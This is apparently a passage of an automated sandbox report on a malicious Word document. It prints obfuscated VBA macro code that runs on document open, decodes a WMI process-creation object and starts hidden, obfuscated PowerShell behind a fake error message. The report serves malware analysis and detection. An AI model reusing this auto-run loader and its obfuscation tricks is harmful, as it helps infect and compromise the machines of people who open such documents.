25 | Redim JeDBhB(1 To LOF(intGend) - 5) | LOF; intGend
26 | Get # efPVC, , JeDBhB |
27 | Get # efPVC, , JeDBhB |
28 | Get # efPVC, , JeDBhB |
29 | Close # efPVC |
29 | gNNhpjuZF: |
31 | Ay7bggewedd3phn5 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s" |
32 | Goto ZCRUUEr |
33 | Dim COxEbv() as Byte |
34 | Dim pIXfAL as Integer |
35 | pIXfAL = FreeFile | FreeFile
36 | Open "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ" For Binary Access Read As # pIXfAL | Open
37 | Open "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA" For Binary Access Read As # pIXfAL | Open
38 | Redim COxEbv(1 To LOF(intGend) - 5) | LOF; intGend
39 | Get # pIXfAL, , COxEbv |
40 | Get # pIXfAL, , COxEbv |
41 | Get # pIXfAL, , COxEbv |
42 | Close # pIXfAL |
42 | ZCRUUEr: |
44 | Imytpzb0s5n = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s" |
45 | Goto XNcuAGoGD |
46 | Dim NFVBCEf() as Byte |
47 | Dim MoyUg as Integer |
48 | MoyUg = FreeFile | FreeFile
49 | Open "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl" For Binary Access Read As # MoyUg | Open
50 | Open "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf" For Binary Access Read As # MoyUg | Open
51 | Redim NFVBCEf(1 To LOF(intGend) - 5) | LOF; intGend
52 | Get # MoyUg, , NFVBCEf |
53 | Get # MoyUg, , NFVBCEf |
54 | Get # MoyUg, , NFVBCEf |
55 | Close # MoyUg |
55 | XNcuAGoGD: |
57 | B5vh4w9yggemggw4dw = "]b2[ss]b2[s" |
58 | Goto AeWeHOJCg |
59 | Dim kBZBQ() as Byte |
60 | Dim dNGEjAD as Integer |
61 | dNGEjAD = FreeFile | FreeFile
62 | Open "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ" For Binary Access Read As # dNGEjAD | Open
63 | Open "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD" For Binary Access Read As # dNGEjAD | Open
64 | Redim kBZBQ(1 To LOF(intGend) - 5) | LOF; intGend
65 | Get # dNGEjAD, , kBZBQ |
66 | Get # dNGEjAD, , kBZBQ |
67 | Get # dNGEjAD, , kBZBQ |
68 | Close # dNGEjAD |
68 | AeWeHOJCg: |
70 | U5bklmbs296g6nu09w = Imytpzb0s5n + B5vh4w9yggemggw4dw + Ay7bggewedd3phn5 + snahbsd + Umvc8xcohh1q3zu0kx |
71 | Goto GbSOBaBqc |
72 | Dim HQLYP() as Byte |
73 | Dim vjURJ as Integer |
74 | vjURJ = FreeFile | FreeFile
75 | Open "F:\ySkIB\qKFmg\KrORs.CZcSEH" For Binary Access Read As # vjURJ | Open
76 | Open "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF" For Binary Access Read As # vjURJ | Open
77 | Redim HQLYP(1 To LOF(intGend) - 5) | LOF; intGend
78 | Get # vjURJ, , HQLYP |
79 | Get # vjURJ, , HQLYP |
80 | Get # vjURJ, , HQLYP |
81 | Close # vjURJ |
81 | GbSOBaBqc: |
83 | Jf4lj98w22pm0 = Tfizx5uxnfjbxnml(U5bklmbs296g6nu09w) |
84 | Goto ykcixJTsM |
85 | Dim DnGiABxzG() as Byte |
86 | Dim pGKDuEB as Integer |
87 | pGKDuEB = FreeFile | FreeFile
88 | Open "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP" For Binary Access Read As # pGKDuEB | Open
89 | Open "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF" For Binary Access Read As # pGKDuEB | Open
90 | Redim DnGiABxzG(1 To LOF(intGend) - 5) | LOF; intGend
91 | Get # pGKDuEB, , DnGiABxzG |
92 | Get # pGKDuEB, , DnGiABxzG |
93 | Get # pGKDuEB, , DnGiABxzG |
94 | Close # pGKDuEB |
94 | ykcixJTsM: |
96 | Set Wvxrpert99ob1x = CreateObject(Jf4lj98w22pm0) | CreateObject("winmgmts:win32_process"); executed
97 | Goto uUxhxDE |
98 | Dim AUrNIzEG() as Byte |
99 | Dim lkVoRJ as Integer |
100 | lkVoRJ = FreeFile | FreeFile
101 | Open "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG" For Binary Access Read As # lkVoRJ | Open
102 | Open "O:\BNSoFH\dvEzG\mUAiwC.yubtGH" For Binary Access Read As # lkVoRJ | Open
103 | Redim AUrNIzEG(1 To LOF(intGend) - 5) | LOF; intGend
104 | Get # lkVoRJ, , AUrNIzEG |
105 | Get # lkVoRJ, , AUrNIzEG |
106 | Get # lkVoRJ, , AUrNIzEG |
107 | Close # lkVoRJ |
107 | uUxhxDE: |
109 | Ysqw359hi8dilh_ = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs)) | Mid; Len("<obfuscated ]b2[s-encoded document text omitted>") -> 19213; executed
110 | Goto qKxQJQE |
111 | Dim LITXEDEBE() as Byte |
112 | Dim JvVTCss as Integer |
113 | JvVTCss = FreeFile | FreeFile
114 | Open "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh" For Binary Access Read As # JvVTCss | Open
115 | Open "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB" For Binary Access Read As # JvVTCss | Open
116 | Redim LITXEDEBE(1 To LOF(intGend) - 5) | LOF; intGend
117 | Get # JvVTCss, , LITXEDEBE |
118 | Get # JvVTCss, , LITXEDEBE |
119 | Get # JvVTCss, , LITXEDEBE |
120 | Close # JvVTCss |
120 | qKxQJQE: |
122 | Goto ZWAfIID |
123 | Dim sYcQrq() as Byte |
124 | Dim aPIAJ as Integer |
125 | aPIAJ = FreeFile | FreeFile
126 | Open "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW" For Binary Access Read As # aPIAJ | Open
127 | Open "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH" For Binary Access Read As # aPIAJ | Open
128 | Redim sYcQrq(1 To LOF(intGend) - 5) | LOF; intGend
129 | Get # aPIAJ, , sYcQrq |
130 | Get # aPIAJ, , sYcQrq |
131 | Get # aPIAJ, , sYcQrq |
132 | Close # aPIAJ |
132 | ZWAfIID: |
134 | Wvxrpert99ob1x.Create Tfizx5uxnfjbxnml(Ysqw359hi8dilh_), Il6ap8xlb73, C1lvz_08ro0vrbmv6 | SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD <base64-encoded PowerShell payload omitted>,,) -> 0; Il6ap8xlb73; C1lvz_08ro0vrbmv6; executed
135 | Goto cgFzqJS |
136 | Dim ktJgD() as Byte |
137 | Dim rxYZps as Integer |
138 | rxYZps = FreeFile | FreeFile
139 | Open "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH" For Binary Access Read As # rxYZps | Open
140 | Open "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD" For Binary Access Read As # rxYZps | Open
141 | Redim ktJgD(1 To LOF(intGend) - 5) | LOF; intGend
142 | Get # rxYZps, , ktJgD |
143 | Get # rxYZps, , ktJgD |
144 | Get # rxYZps, , ktJgD |
145 | Close # rxYZps |
145 | cgFzqJS: |
147 | Goto fMGbFJDRE |
148 | Dim Gyyqq() as Byte |
149 | Dim UfOeJ as Integer |
150 | UfOeJ = FreeFile | FreeFile
151 | Open "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH" For Binary Access Read As # UfOeJ | Open
152 | Open "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF" For Binary Access Read As # UfOeJ | Open
153 | Redim Gyyqq(1 To LOF(intGend) - 5) | LOF; intGend
154 | Get # UfOeJ, , Gyyqq |
155 | Get # UfOeJ, , Gyyqq |
156 | Get # UfOeJ, , Gyyqq |
157 | Close # UfOeJ |
157 | fMGbFJDRE: |
159 | End Function |

APIs | Meta Information
FreeFile
Open
Open
LOF
intGend
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Ubnvz_721a0k0z7gn
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: LOF
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: intGend
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Replace
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Zxrltp30ofw
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: Open
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: LOF
Part of subcall function Xrl25i0p5sd_oj40b@Jwq9b1lb0hmm7: intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend

Strings | Decrypted Strings
"F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu"
"O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG"
"F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf"
"O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG"
"F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc"
"O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm"
"F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH"
"O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB"
Line | Instruction | Meta Information
160 | Function Tfizx5uxnfjbxnml(Vxdy838fy4c1xspht) |
161 | On Error Resume Next | executed
162 | Goto wcDKJI |
163 | Dim tKzwqzI() as Byte |
164 | Dim BrygCBI as Integer |
165 | BrygCBI = FreeFile | FreeFile
166 | Open "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu" For Binary Access Read As # BrygCBI | Open
167 | Open "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG" For Binary Access Read As # BrygCBI | Open
168 | Redim tKzwqzI(1 To LOF(intGend) - 5) | LOF; intGend
169 | Get # BrygCBI, , tKzwqzI |
170 | Get # BrygCBI, , tKzwqzI |
171 | Get # BrygCBI, , tKzwqzI |
172 | Close # BrygCBI |
172 | wcDKJI: |
174 | Tt79y87d36ripg03s = (Vxdy838fy4c1xspht) |
175 | Goto lOETktD |
176 | Dim gJLEFBFsL() as Byte |
177 | Dim BIeAA as Integer |
178 | BIeAA = FreeFile | FreeFile
179 | Open "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf" For Binary Access Read As # BIeAA | Open
180 | Open "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG" For Binary Access Read As # BIeAA | Open
181 | Redim gJLEFBFsL(1 To LOF(intGend) - 5) | LOF; intGend
182 | Get # BIeAA, , gJLEFBFsL |
183 | Get # BIeAA, , gJLEFBFsL |
184 | Get # BIeAA, , gJLEFBFsL |
185 | Close # BIeAA |
185 | lOETktD: |
187 | Haq5kvro2d9z = Xrl25i0p5sd_oj40b(Tt79y87d36ripg03s) |
188 | Goto RimyuHaBD |
189 | Dim nOveD() as Byte |
190 | Dim fFPBDj as Integer |
191 | fFPBDj = FreeFile | FreeFile
192 | Open "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc" For Binary Access Read As # fFPBDj | Open
193 | Open "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm" For Binary Access Read As # fFPBDj | Open
194 | Redim nOveD(1 To LOF(intGend) - 5) | LOF; intGend
195 | Get # fFPBDj, , nOveD |
196 | Get # fFPBDj, , nOveD |
197 | Get # fFPBDj, , nOveD |
198 | Close # fFPBDj |
198 | RimyuHaBD: |
200 | Tfizx5uxnfjbxnml = Haq5kvro2d9z |
201 | Goto VSbuEj |
202 | Dim RzwvkExUI() as Byte |
203 | Dim tSFvVJKHm as Integer |
204 | tSFvVJKHm = FreeFile | FreeFile
205 | Open "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH" For Binary Access Read As # tSFvVJKHm | Open
206 | Open "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB" For Binary Access Read As # tSFvVJKHm | Open
207 | Redim RzwvkExUI(1 To LOF(intGend) - 5) | LOF; intGend
208 | Get # tSFvVJKHm, , RzwvkExUI |
209 | Get # tSFvVJKHm, , RzwvkExUI |
210 | Get # tSFvVJKHm, , RzwvkExUI |
211 | Close # tSFvVJKHm |
211 | VSbuEj: |
213 | End Function |

APIs | Meta Information
Ubnvz_721a0k0z7gn
FreeFile
Open
Open
LOF
intGend
Replace


Zxrltp30ofw
FreeFile
Open
Open
LOF
intGend

Strings | Decrypted Strings
"F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX"
"O:\qklyMYNC\IkLXI\wrvzJw.AssIJ"
"]b2[s"
"F:\WnCoG\HBbVaCA\fukyDw.vGjESBX"
"O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV"
Line | Instruction | Meta Information
214 | Function Xrl25i0p5sd_oj40b(Rttd6rymyw4z) |
215 | W7t8l1jd1ya = Ubnvz_721a0k0z7gn | Ubnvz_721a0k0z7gn; executed
216 | Goto JJjHG |
217 | Dim SkWVG() as Byte |
218 | Dim ksQLDZi as Integer |
219 | ksQLDZi = FreeFile | FreeFile
220 | Open "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX" For Binary Access Read As # ksQLDZi | Open
221 | Open "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ" For Binary Access Read As # ksQLDZi | Open
222 | Redim SkWVG(1 To LOF(intGend) - 5) | LOF; intGend
223 | Get # ksQLDZi, , SkWVG |
224 | Get # ksQLDZi, , SkWVG |
225 | Get # ksQLDZi, , SkWVG |
226 | Close # ksQLDZi |
226 | JJjHG: |
228 | Xrl25i0p5sd_oj40b = Replace(Rttd6rymyw4z, "]b2[s", Zxrltp30ofw) | Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process; Zxrltp30ofw; executed
229 | Goto hSQRFSr |
230 | Dim WkbcFJEAD() as Byte |
231 | Dim WppWDKHVA as Integer |
232 | WppWDKHVA = FreeFile | FreeFile
233 | Open "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX" For Binary Access Read As # WppWDKHVA | Open
234 | Open "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV" For Binary Access Read As # WppWDKHVA | Open
235 | Redim WkbcFJEAD(1 To LOF(intGend) - 5) | LOF; intGend
236 | Get # WppWDKHVA, , WkbcFJEAD |
237 | Get # WppWDKHVA, , WkbcFJEAD |
238 | Get # WppWDKHVA, , WkbcFJEAD |
239 | Close # WppWDKHVA |
239 | hSQRFSr: |
241 | End Function |

Module: Ouz_y28f7ehnqn

Declaration
Line | Content
1 | Attribute VB_Name = "Ouz_y28f7ehnqn"
2 | Attribute VB_Base = "1Normal.ThisDocument"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = True
8 | Attribute VB_Customizable = True

Executed Functions
APIs | Meta Information
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Item
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: CreateObject
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Mid
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Len
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open
Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Create

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Il6ap8xlb73

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: C1lvz_08ro0vrbmv6

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Nr8et74sjtle6s@Jwq9b1lb0hmm7: intGend

                                              Line  Instruction                   Meta Information
                                              9     Private Sub Document_open()
                                              10    Nr8et74sjtle6s                executed
                                              11    End Sub

                                              Module: Z5ncc5dwidbkjld

                                              Declaration
                                              Line  Content
                                              1     Attribute VB_Name = "Z5ncc5dwidbkjld"


                                                Executed Functions

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2225450850.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2225450850.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2225450850.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd

                                                Non-executed Functions